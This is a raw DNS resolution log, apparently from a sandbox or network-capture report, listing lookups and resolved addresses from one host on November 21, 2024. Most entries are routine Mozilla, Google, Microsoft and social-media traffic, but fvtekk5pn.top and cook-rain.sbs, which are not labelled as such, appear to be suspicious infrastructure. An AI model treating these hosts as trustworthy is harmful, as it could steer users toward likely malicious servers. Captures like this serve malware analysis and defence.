                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.820607901 CET1.1.1.1192.168.2.40xf4edNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.251895905 CET1.1.1.1192.168.2.40xaf7dNo error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.251895905 CET1.1.1.1192.168.2.40xaf7dNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.482131958 CET1.1.1.1192.168.2.40x221bNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.548595905 CET1.1.1.1192.168.2.40x75caNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.548595905 CET1.1.1.1192.168.2.40x75caNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.812041998 CET1.1.1.1192.168.2.40x694aNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.795566082 CET1.1.1.1192.168.2.40xba39No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.796896935 CET1.1.1.1192.168.2.40x25aeNo error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.796896935 CET1.1.1.1192.168.2.40x25aeNo error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.002213955 CET1.1.1.1192.168.2.40x5641No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.002213955 CET1.1.1.1192.168.2.40x5641No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.002213955 CET1.1.1.1192.168.2.40x5641No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.002547026 CET1.1.1.1192.168.2.40x8704No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.002547026 CET1.1.1.1192.168.2.40x8704No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.230379105 CET1.1.1.1192.168.2.40xdfe1No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.462347984 CET1.1.1.1192.168.2.40xff38No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.667951107 CET1.1.1.1192.168.2.40x6f5aNo error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.407327890 CET1.1.1.1192.168.2.40x6c0bNo error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.380090952 CET1.1.1.1192.168.2.40xc0d8No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.380108118 CET1.1.1.1192.168.2.40x7d22No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.265966892 CET1.1.1.1192.168.2.40x8aadNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.266036987 CET1.1.1.1192.168.2.40xa71dNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.266036987 CET1.1.1.1192.168.2.40xa71dNo error (0)shed.dual-low.s-part-0015.t-0009.t-msedge.nets-part-0015.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.266036987 CET1.1.1.1192.168.2.40xa71dNo error (0)s-part-0015.t-0009.t-msedge.net13.107.246.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267137051 CET1.1.1.1192.168.2.40x5175No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267137051 CET1.1.1.1192.168.2.40x5175No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267137051 CET1.1.1.1192.168.2.40x5175No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267137051 CET1.1.1.1192.168.2.40x5175No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267798901 CET1.1.1.1192.168.2.40x4464No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.267798901 CET1.1.1.1192.168.2.40x4464No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.383523941 CET1.1.1.1192.168.2.40x187No error (0)support.mozilla.orgprod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.383523941 CET1.1.1.1192.168.2.40x187No error (0)prod.sumo.prod.webservices.mozgcp.netus-west1.prod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.383523941 CET1.1.1.1192.168.2.40x187No error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.387923002 CET1.1.1.1192.168.2.40x9e5fNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.387923002 CET1.1.1.1192.168.2.40x9e5fNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.450454950 CET1.1.1.1192.168.2.40x853eNo error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.450454950 CET1.1.1.1192.168.2.40x853eNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.614237070 CET1.1.1.1192.168.2.40x41c9No error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.769175053 CET1.1.1.1192.168.2.40x635eNo error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.769278049 CET1.1.1.1192.168.2.40xe1abNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.770410061 CET1.1.1.1192.168.2.40x6a41No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.770410061 CET1.1.1.1192.168.2.40x6a41No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.770410061 CET1.1.1.1192.168.2.40x6a41No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.770410061 CET1.1.1.1192.168.2.40x6a41No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.772449970 CET1.1.1.1192.168.2.40x734fNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.000710011 CET1.1.1.1192.168.2.40x347cNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.219513893 CET1.1.1.1192.168.2.40x3678No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.320139885 CET1.1.1.1192.168.2.40x628No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.320139885 CET1.1.1.1192.168.2.40x628No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.320139885 CET1.1.1.1192.168.2.40x628No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.320139885 CET1.1.1.1192.168.2.40x628No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.574575901 CET1.1.1.1192.168.2.40xd4c2No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.574575901 CET1.1.1.1192.168.2.40xd4c2No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.574575901 CET1.1.1.1192.168.2.40xd4c2No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.574575901 CET1.1.1.1192.168.2.40xd4c2No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.420007944 CET1.1.1.1192.168.2.40x2397No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.603147984 CET1.1.1.1192.168.2.40x88ffNo error (0)a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma17.rackcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.603147984 CET1.1.1.1192.168.2.40x88ffNo error (0)a17.rackcdn.coma17.rackcdn.com.mdc.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.918853045 CET1.1.1.1192.168.2.40xa651No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.919250965 CET1.1.1.1192.168.2.40x72bdNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.919250965 CET1.1.1.1192.168.2.40x72bdNo error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.919644117 CET1.1.1.1192.168.2.40x32b1No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.919644117 CET1.1.1.1192.168.2.40x32b1No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.152787924 CET1.1.1.1192.168.2.40x4febNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153064013 CET1.1.1.1192.168.2.40x9d76No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153342009 CET1.1.1.1192.168.2.40xc4acNo error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.381855965 CET1.1.1.1192.168.2.40x161eNo error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.382457018 CET1.1.1.1192.168.2.40x2961No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.382457018 CET1.1.1.1192.168.2.40x2961No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.382457018 CET1.1.1.1192.168.2.40x2961No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.382457018 CET1.1.1.1192.168.2.40x2961No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.383862972 CET1.1.1.1192.168.2.40xc9aNo error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.613557100 CET1.1.1.1192.168.2.40xe548No error (0)www.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.613557100 CET1.1.1.1192.168.2.40xe548No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.613557100 CET1.1.1.1192.168.2.40xe548No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.613557100 CET1.1.1.1192.168.2.40xe548No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.613557100 CET1.1.1.1192.168.2.40xe548No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.614484072 CET1.1.1.1192.168.2.40x4903No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.846976042 CET1.1.1.1192.168.2.40x522cNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.846976042 CET1.1.1.1192.168.2.40x522cNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.846976042 CET1.1.1.1192.168.2.40x522cNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.846976042 CET1.1.1.1192.168.2.40x522cNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.851814032 CET1.1.1.1192.168.2.40xacaeNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.508783102 CET1.1.1.1192.168.2.40x47beNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.508783102 CET1.1.1.1192.168.2.40x47beNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:07.557980061 CET1.1.1.1192.168.2.40xca1No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:18.810949087 CET1.1.1.1192.168.2.40x33c9No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:00.298870087 CET1.1.1.1192.168.2.40x7b44No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.849080086 CET1.1.1.1192.168.2.40xfdcNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.849080086 CET1.1.1.1192.168.2.40xfdcNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:14.548120022 CET1.1.1.1192.168.2.40xbe7No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:14.548120022 CET1.1.1.1192.168.2.40xbe7No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:17.335731030 CET1.1.1.1192.168.2.40x30d8No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:17.350197077 CET1.1.1.1192.168.2.40xf3dbNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:09.776106119 CET1.1.1.1192.168.2.40xa3c2No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.225209951 CET1.1.1.1192.168.2.40xff82No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.225209951 CET1.1.1.1192.168.2.40xff82No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:21.303106070 CET1.1.1.1192.168.2.40xb864No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:21.319431067 CET1.1.1.1192.168.2.40x7282No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:22.101767063 CET1.1.1.1192.168.2.40x317dNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:22.329303980 CET1.1.1.1192.168.2.40x155fNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:12.810887098 CET1.1.1.1192.168.2.40xeb0fNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:15.927767992 CET1.1.1.1192.168.2.40xbfb2No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:15.927767992 CET1.1.1.1192.168.2.40xbfb2No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.625967026 CET1.1.1.1192.168.2.40x97cNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.859560966 CET1.1.1.1192.168.2.40xb58eNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.364003897 CET1.1.1.1192.168.2.40xd2bNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.364003897 CET1.1.1.1192.168.2.40xd2bNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:25.726847887 CET1.1.1.1192.168.2.40x2b13No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:25.726847887 CET1.1.1.1192.168.2.40x2b13No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:34.323630095 CET1.1.1.1192.168.2.40x6ff5No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:34.323630095 CET1.1.1.1192.168.2.40x6ff5No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
